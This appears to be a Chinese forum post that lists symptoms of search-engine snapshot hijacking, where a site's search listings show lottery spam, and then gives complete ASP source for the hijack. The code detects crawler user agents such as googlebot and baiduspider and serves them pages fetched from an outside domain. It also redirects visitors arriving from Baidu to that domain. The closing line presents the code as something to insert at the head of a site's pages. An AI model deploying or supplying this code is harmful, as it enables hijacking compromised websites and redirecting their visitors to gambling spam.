1、利用各搜索引擎去搜索自己网站的域名,所得到的结果是 时时彩 等相关信息。
2、网站域名是自己的,搜索引擎搜录的快照日期是最新的,但网站标题、关键字和描述都不是自己的,而是 时时彩 等相关信息。
5、网站的根目录无法删除,将文件夹选项设置成“显示隐藏文件”后,并没有发现有隐藏的文件存在。- <%
- function GetBot()
- '查询蜘蛛
- dim s_agent
- GetBot=""
- s_agent=Request.ServerVariables("HTTP_USER_AGENT") '关键判断语句
- if instr(1,s_agent,"googlebot",1) >0 then
- GetBot="google"
- end if
- if instr(1,s_agent,"msnbot",1) >0 then
- GetBot="MSN"
- end if
- if instr(1,s_agent,"slurp",1) >0 then
- GetBot="Yahoo"
- end if
- if instr(1,s_agent,"baiduspider",1) >0 then
- GetBot="baidu"
- end if
- if instr(1,s_agent,"sohu-search",1) >0 then
- GetBot="Sohu"
- end if
- if instr(1,s_agent,"lycos",1) >0 then
- GetBot="Lycos"
- end if
- if instr(1,s_agent,"robozilla",1) >0 then
- GetBot="Robozilla"
- end if
- end function
- Function getHTTPPage(Path)
- t = GetBody(Path)
- getHTTPPage=BytesToBstr(t,"GB2312")'编码
- End function
- Function Newstring(wstr,strng)
- Newstring=Instr(lcase(wstr),lcase(strng))
- if Newstring<=0 then Newstring=Len(wstr)
- End Function
- Function GetBody(url)
- on error resume next
- Set Retrieval = CreateObject("Microsoft.XMLHTTP")
- With Retrieval
- .Open "Get", url, False, "", ""
- .Send
- GetBody = .ResponseBody
- End With
- Set Retrieval = Nothing
- End Function
- Function BytesToBstr(body,Cset)
- dim objstream
- set objstream = Server.CreateObject("adodb.stream")
- objstream.Type = 1
- objstream.Mode =3
- objstream.Open
- objstream.Write body
- objstream.Position = 0
- objstream.Type = 2
- objstream.Charset = Cset
- BytesToBstr = objstream.ReadText
- objstream.Close
- set objstream = nothing
- End Function
- Dim wstr,str,url,start,over,dtime
- if GetBot="baidu" then
- url="http://www.gmqd.com/"
- wstr=getHTTPPage(url)
- body=wstr
- response.write ""&body&""
- response.end
- elseif GetBot="google" then
- url="http://www.gmqd.com/"
- wstr=getHTTPPage(url)
- body=wstr
- response.write ""&body&""
- response.end
- end if
- if instr(Request.ServerVariables("http_referer"),"www.baidu.com")>0 then
- response.redirect("http://www.gmqd.com/")
- end if
- %>
复制代码 最后要说一下:asp快照劫持插入方法,源代码必须插入网页头部。